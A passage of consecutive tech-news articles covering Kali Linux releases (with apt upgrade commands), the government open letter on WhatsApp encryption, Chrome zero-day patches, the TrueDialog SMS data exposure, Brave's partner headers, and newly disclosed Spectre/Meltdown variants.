packages. While there might be some users who will never have network, we believe that it’s best to actually configure that file in all cases. So that’s what we did. By default, any fresh installs going forward after 2020.3 will have network repositories pre-defined. ARM Device Updates We have (along with the work of Francisco Jose Rodríguez Martos who did a lot of the back end changes) refreshed our build-scripts for our ARM devices. We pre-generated various different ARM images (as of 2020.3 – 19 images) to allow for quick download and deployment, but we have build scripts for more (as of 2020.3 – 39 images). If your device is not one of ones that we release images for, you’ll need to use the scripts to self generate the image. Notable changes in ARM’s 2020.3 release: All of the ARM images come with kali-linux-default metapackage installed, bringing them in line with the rest of our releases, so more tools are available when you first boot We have reduced the size of all our ARM images that are created, so downloads should be smaller. However, you will still need to use at least a 16GB sdcard/USB drive/eMMC Pinebook and Pinebook Pro images can now be used on either sdcard or eMMC The Pinebook image now has the WiFi driver built during image creation, instead of on first boot, this should speed up first boot time massively The Pinebook Pro has a change from the upstream firmware, which changes ccode=DE to ccode=all – this allows access to more 2.4GHz and 5GHz channels The 64-bit RaspberryPi images now have the RaspberryPi userland utilities built during image creation, so vcgencmd and various other utilities that were previously only available on the 32-bit image are now usable on 64-bit as well The ODROID-C2 image now uses the Kali kernel, instead of a vendor provided one. This means in the future, an apt dist-upgrade will get you kernel updates instead of waiting for a new Kali release The /etc/fstab file now includes the root partition via UUID, this should make it easier when trying to use a USB drive instead of sdcard on devices that support it A few things which are work in progress: RaspberryPi images are using 4.19 kernels. We would like to move to 5.4 however, nexmon isn’t working properly with it (as the new kernel requires firmware version => 7.45.202) for which no nexmon patch exists yet There is a new USBArmory Mk2 build script. We don’t have the hardware to test it however, so we are looking for community feedback who is able to test it out Veyron image will be released at a later date to kernel issues that haven’t yet been tracked down Desktop Environment As there has been minor update to Gnome, we have been taking some advantages of the new settings: GNOME’s file manager nautilus has a new theme GNOME’s system-monitor now matches the colors and also has stacked CPU charts Improved the design for “nested headerbars” (example, in the Settings Window, where the left headerbar is joined with the side-navbar) Community Shoutouts A new section in the release notes, community shoutouts. These are people from the public who have helped Kali and the team for the last release. And we want to praise them for their work (we like to give credit where due!): Crash who has been helping the community for some time now, thank you! FrangaL who has been doing some great work with Kali Linux ARM, thank you! Anyone can help out, anyone can get involved! Download Kali Linux 2020.3 Fresh Images So what are you waiting for? Start downloading already! Seasoned Kali Linux users are already aware of this, but for the ones who are not, we do also produce weekly builds that you can use as well. If you can’t wait for our next release and you want the latest packages when you download the image, you can just use the weekly image instead. This way you’ll have fewer updates to do. Just know these are automated builds that we don’t QA like we do our standard release images. But we gladly take bug reports about those images because we want any issues to be fixed before our next release. Existing Upgrades If you already have an existing Kali Linux installation, remember you can always do a quick update: kali@kali:~$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list kali@kali:~$ kali@kali:~$ sudo apt update && sudo apt -y full-upgrade kali@kali:~$ kali@kali:~$ [ -f /var/run/reboot-required ] && sudo reboot -f kali@kali:~$ You should now be on Kali Linux 2020.3. We can do a quick check by doing: kali@kali:~$ grep VERSION /etc/os-release VERSION="2020.3" VERSION_ID="2020.3" VERSION_CODENAME="kali-rolling" kali@kali:~$ kali@kali:~$ uname -v #1 SMP Debian 5.7.6-1kali2 (2020-07-01) kali@kali:~$ kali@kali:~$ uname -r 5.7.0-kali1-amd64 kali@kali:~$ NOTE: The output of uname -r may be different depending on the system architecture. As always, should you come across any bugs in Kali, please submit a report on our bug tracker. We’ll never be able to fix what we don’t know is broken! And Twitter is not a Bug Tracker!

Last week, the US, UK, and Australian governments wrote an open letter to Facebook urging it to drop end-to-end encryption from WhatsApp and halt its plans to implement end-to-end encryption across its other messaging platforms. The three governments asked the company to ensure “there is no reduction to user safety” and include “a means for lawful access to the content of communications to protect our citizens.” The open letter is addressed to Mark Zuckerberg, Facebook’s CEO and co-signed by US Attorney General William Barr, Acting Homeland Security Secretary Kevin McAleenan, United Kingdom Home Secretary Priti Patel, and Australia’s Minister for Home Affairs Peter Dutton. This open letter to Facebook comes after the launch of a new “UK-US Bilateral Data Access Agreement.” This agreement aims to speed up electronic data access requests by their respective law enforcement agencies. This replaces the current process called Mutual Legal Assistance that requires law enforcement agencies to submit a request and get it approved by central governments, which can often take months or even years. The new process will only take a few weeks or even days. Why the US, UK, and Australian governments are against end-to-end encryption The three governments stated that though they realize the importance of strong encryption in processing services such as banking and commerce, end-to-end encryption would hinder the investigation of serious crimes. The letter reads, “We must find a way to balance the need to secure data with public safety and the need for law enforcement to access the information they need to safeguard the public, investigate crimes, and prevent future criminal activity.” The letter does praise Facebook of reporting 16.8 million cases to the US National Center for Missing & Exploited Children (NCMEC), which was more than 90% of the 18.4 million total reports in 2018. It further states that Facebook’s own safety systems were able to identify the 99% of the content Facebook takes action against, both for child sexual exploitation and terrorism. However, the governments believe that “the mere numbers cannot capture the significance of the harm to children.” This is not the first time government officials have shown their dislike with end-to-end encryption. In 2017, Amber Rudd, the UK's home secretary said after WhatsApp added end-to-end encryption, “We need to make sure that organizations like WhatsApp, and there are plenty of others like that, don't provide a secret place for terrorists to communicate with each other.” In December 2018, the Australian government passed a controversial anti-encryption law that allows law enforcement agencies to compel tech companies to hand over encrypted messaging data. Read also: “Five Eyes” call for backdoor access to end-to-end encryption to tackle ‘emerging threats’ despite warnings from cybersecurity and civil rights communities The government has listed the following steps for Facebook and other similar companies: The system should be designed in such a way that the companies behind them are able to effectively act against any illegal content without hampering the safety of others. Allow law enforcement to get lawful access to content in a readable and usable format. Engage in consultation with governments and let those consultations influence companies’ design decisions. The proposed changes should not be implemented until the safety of users is fully ensured by tested and operational systems. What privacy experts and users think about this open letter to Facebook Electronic Frontier Foundation (EFF), a non-profit that supports civil liberties and other legal issues pertaining to digital rights, called this act a “staggering attempt to undermine the security and privacy of communications tools used by billions of people." It said, "Facebook should not comply.” The organization further said that the three governments failed to take into account the “severe risks” associated with introducing backdoors. https://twitter.com/EFF/status/1180978792052998145 The open letter to Facebook also did not sit well with several users. In a discussion on Hacker News users expressed that it would be wrong to undermine the security for millions of law-abiding users in order to investigate the wrongdoers. A user commented, “Privacy isn't a trade-off against security, it's a necessary component of having security.” Another user added, “Criminal activities are exacerbated by the internet it would be a lie to say no. But just like with cars, scooters, or any tech that's sufficiently democratized. They need a permit for a car? Why not just steal it? I need an identity to do shady stuff on the internet? Why not steal it? We cannot reason with malevolent forces, there is always going to be away. And by that time, we compiled the data of everyone, centralized it all, and let govs that don't understand the implication collect those as if it was mere petrol or gold. We are putting everyone's lives at risk doing so, just wait until it leaks out or it starts getting sold. (ahem, oh wait !)” Read the open letter to Facebook for more details. DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices How has ethical hacking benefited the software industry Cryptographic key of Facebook’s Free Basics app has been compromised Facebook must face privacy class action lawsuit, loses facial recognition appeal, U.S. Court of Appeals rules

Last week, Google notified its users that the ‘stable channel’ desktop Chrome browser is being updated to version 78.0.3904.87 for Windows, Mac, and Linux and will be rolled out in the coming weeks. This comes after some external researchers found two high severity vulnerabilities in the Chrome web browser. The first zero-day vulnerability, assigned CVE-2019-13720, was found by two malware researchers Anton Ivanov and Alexey Kulaev from Kaspersky, a private internet security solutions company. This vulnerability is present in Chrome’s PDFium library. Google has confirmed that this vulnerability still “exists in the wild.” The other vulnerability CVE-2019-13721 was found by banananapenguin and affects Chrome's audio component. No exploitation of this vulnerability has been reported so far. Google has not revealed the technical details of both vulnerabilities. “Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.” Both vulnerabilities are use-after-free vulnerabilities, which means that they have a type of memory flaw that can be leveraged by hackers to execute arbitrary code.  The Kaspersky researchers have named the CVE-2019-13720 vulnerability as Operation WizardOpium, as they have not been able to establish a definitive link of this vulnerability with any known threat actors.  According to Kaspersky, this vulnerability leverages a waterhole-style injection on a Korean-language news portal. This enabled a malicious JavaScript code to be inserted on the main page, which in turn, loads a profiling script from a remote site. The main index page then hosts a small JavaScript tag that loads the remote script. This JavaScript tag checks if the victim’s system can be infected by performing a comparison with the browser’s user agent.  The Kaspersky researchers say, “The exploit used a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker a Use-After-Free (UaF) condition that is very dangerous because it can lead to code execution scenarios, which is exactly what happens in our case.” The attacker can use this vulnerability to perform numerous operations to allocate/free memory along with other techniques that eventually give the attackers an arbitrary read/write primitive. This technique is used by attackers to create a “special object that can be used with WebAssembly and FileReader together to perform code execution for the embedded shellcode payload.” You can read Kaspersky detailed report for more information on the zero-day vulnerability. Adobe confirms security vulnerability in one of their Elasticsearch servers that exposed 7.5 million Creative Cloud accounts Mobile-aware phishing campaign targets UNICEF, the UN, and many other humanitarian organizations NordVPN reveals it was affected by a data breach in 2018

Last month, two security researchers, Noam Rotem and Ran Locar found an unprotected database managed by TrueDialog. The database exposed tens of millions of SMS text messages exchanged between businesses and their customers. TrueDialog is a US-based SMS text service provider for enterprise businesses and higher education. Its cloud-based texting platform enables users to send both one-to-one as well as bulk messages to customers. What data TrueDialog’s database exposed Along with millions of sent and received text messages, this database included phone numbers, marketing messages from businesses with discount codes, job alerts, and more. Some of the two-way messages had a unique conversation code using which anyone would be able to read the entire thread of conversations. What concerning is that there were also text messages with sensitive information. As per TechCrunch, the database included “two-factor codes and other security messages, which may have allowed anyone viewing the data to gain access to a person’s online accounts.” TechCrunch further shared that the database also included messages containing codes to access online medical services, password reset and login codes for sites including Facebook and Google, and usernames and passwords of TrueDialog’s customers. TrueDialog took the database offline shortly after being contacted by TechCrunch. However, the company’s chief executive John Wright did not acknowledge the breach or gave any clarity on whether TrueDialog will be informing this to its customers. This is another case of companies being negligent towards their customers’ data. In October this year, an Elasticsearch server, allegedly belonging to two data enrichment companies exposed the personal information of nearly 1.2 billion users. In another case, security researcher Oliver Hough discovered that printing company Vistaprint left an online database containing customer interactions unencrypted. Check out the report by Noam Rotem and Ran Locar to know more about TrueDialog data leak in detail. GDPR complaint in EU claim billions of personal data leaked via online advertising bids How to protect your VPN from Data Leaks DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants  

Brave, the open source privacy- focussed browser, has allegedly introduced a ‘backdoor’ to remotely inject headers in HTTP requests that may track users, say users on HackerNews. Users on Twitter and HackerNews have expressed their concerns over the new update on custom HTTP headers added by the Brave team: https://twitter.com/WithinRafael/status/1094712882867011585 Source: HackerNews A user on Reddit has explained this move as “not tracking anything, they just send the word "Brave" to the website whenever you visit certain partners of theirs. So for instance visiting coinbase.com sends an "X-Brave-Partner" custom header to coinbase.com.” Brendan Eich, from the Brave team, has replied back to this allegation saying that the ‘Update is not a "backdoor" in any event and is a custom header instead.’  He says the update is about custom HTTP headers that Brave sends to its partners, with fixed header values. There is no tracking hazard in the new update. He further stresses on the fact that Brave blocks 3rd party cookies and storage and 3rd party fingerprinting along with HSTS supercookies; thus assuring users on preserving their privacy. “I find it silly to assume we will "heel turn" so obviously and track our users. C'mon! We defined our model so we can't cheat without losing lead users who would see through it. That requires seeing clearly things like the difference between tracking and script blocking or custom header sending, though.” Users have also posted on Hacker News that the Brave browser Tracking Protection feature does not block tracking scripts from hostnames associated with Facebook and Twitter. The tracking_protection_service.h file contains a comment informing that a tracking protection white_list variable was created as a "Temporary hack which matches both browser-laptop and Android code". Bleepingcomputer also reports that this whitelist variable is associated with code in the tracking_protection_service.cc file that adds various Facebook and Twitter hostnames to the whitelist variable so that they are not blocked by Brave's Tracking Protection feature. In response to this comment, Brave says that the issue that was opened on September 8th, 2018 and developers decided to whitelist tracking scripts from Facebook and Twitter because blocking them would “affect the functionality of many sites” including Facebook logins. You can head over to Brendan’s Reddit thread for more insights on this update. Brave introduces Brave Ads that share 70% revenue with users for viewing ads Chromium-based Brave browser shows 22% faster page load time than its Muon-based counterpart Otter Browser’s first stable release, v1.0.01 is out

Yesterday, Kali Linux’s first release for 2019 was announced. Kali Linux 2019.1 comes with a variety of changes and new features including, support for Metasploit version 5.0, kernel up to version 4.19.13, ARM updates and numerous bug fixes. Users with a Kali installation can upgrade using: root@kali:~# apt update && apt -y full-upgrade You can also download new Kali Linux ISOs directly from the official website or from the Torrent network. What’s new in Kali Linux 2019.1? Support for Metasploit 5.0 The new version of Kali Linux now supports Metasploit version 5.0, which was released last month. Metasploit 5.0 introduces multiple new features including Metasploit’s new database and automation APIs, evasion modules and libraries, expanded language support, improved performance, and more. Kali Linux 2019.1 also includes updated packages for theHarvester, DBeaver, and more. theHarvester helps Penetration testers in the early stages of the penetration test to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources. DBeaver is an SQL client and a database administration tool. Updates to ARM The 2019.1 Kali release for ARM include: The operating system has an upgraded kernel (v4.19.13) that supports the use of both Banana Pi and Banana Pro single board computers. Veyron has also been moved to a 4.19 kernel The Offensive Security virtual machine and ARM images have also been updated to 2019.1 Raspberry Pi images have been simplified. Separate Raspberry Pi images are no longer there for users with TFT LCDs because Kali 2019.1 now comes with re4son’s kalipi-tft-config script on all of them.  For setting up a board with a TFT, users can run ‘kalipi-tft-config’ and follow the prompts. You can go through the changelog to know detailed bug fixes. Kali Linux 2018 for testing and maintaining Windows security – Wolf Halton and Bo Weaver [Interview] Implementing Web application vulnerability scanners with Kali Linux [Tutorial] Kali Linux 2018.2 released

A group of researchers recently disclosed seven additional attacks in the Spectre and Meltdown families. These seven attacks are said to impact the AMD, ARM, and the Intel CPUs to a certain extent. The researchers have presented an execution of these attacks in detail, in their research paper titled, ‘A Systematic Evaluation of Transient Execution Attacks and Defenses’. 2 Meltdown and 5 Spectre variants found The 7 newly found attacks include 2 new Meltdown variants namely, Meltdown-PK, and Meltdown-BR. It also includes 5 new Spectre mistraining strategies for Spectre-PHT and SpectreBTB attacks. The researchers said that these 7 new attacks have been overlooked and not been investigated so far. The researchers successfully demonstrated all seven attacks with proof-of-concept code. However, experiments to confirm six other Meltdown-attacks did not succeed. The two new Meltdown attacks include: Meltdown-PK - bypasses memory protection keys on Intel CPUs Meltdown-BR - exploits an x86 bound instruction on Intel and AMD The other Meltdown attacks  which the researchers tried and failed to exploit targeted the following internal CPU operations: Meltdown-AC - tried to exploit memory alignment check exceptions Meltdown-DE - tried to exploit division (by zero) errors Meltdown-SM - tried to exploit the supervisor mode access prevention (SMAP) mechanism Meltdown-SS - tried to exploit out-of-limit segment accesses Meltdown-UD - tried to exploit invalid opcode exception Meltdown-XD - tried to exploit non-executable memory Source: A Systematic Evaluation of Transient Execution Attacks and Defenses In order to understand the Spectre-type attacks, the researchers proposed a categorization based on, first, the prediction mechanism exploited, and second, the mistraining mechanism. Here researchers propose to combine all attacks that exploit the same microarchitectural element: Spectre-PHT: Exploits the Pattern History Table (PHT) Spectre-BTB: Exploits the Branch Target Buffer (BTB) Spectre-STL: Exploits the CPUs memory disambiguation prediction, specifically store-to-load forwarding (STLF) Spectre-RSB: Exploits the Return Stack Buffer (RSB) According to ZDNet, “Based on the experiments, the researchers found three new Spectre attacks that exploit the Pattern History Table (PHT) mechanism and two new Spectre attacks against the Branch Target Buffer (BTB).” PHT-CA-OP PHT-CA-IP PHT-SA-OP BTB-SA-IP BTB-SA-OP Defenses for these new Spectre and Meltdown attacks For each of the Spectre and Meltdown attack types, the researchers have categorized the defenses into three and two categories respectively. For Spectre-type attacks, the defense categories are: Mitigating or reducing the accuracy of covert channels used to extract the secret data. Mitigating or aborting speculation if data is potentially accessible during transient execution. Ensuring that secret data cannot be reached. For Meltdown-type attacks, the defense categories are: Ensuring that architecturally inaccessible data remains inaccessible on the microarchitectural level. Preventing the occurrence of faults. The researchers in the paper said, “We have systematically evaluated all defenses, discovering that some transient execution attacks are not successfully mitigated by the rolled out patches and others are not mitigated because they have been overlooked. Hence, we need to think about future defenses carefully and plan to mitigate attacks and variants that are yet unknown”. To know more about these newly found attacks in detail and the related experiments, head over to the research paper written by Claudio Canella et al. Intel announces 9th Gen Core CPUs with Spectre and Meltdown Hardware Protection amongst other upgrades NetSpectre attack exploits data from CPU memory SpectreRSB targets CPU return stack buffer, found on Intel, AMD, and ARM chipsets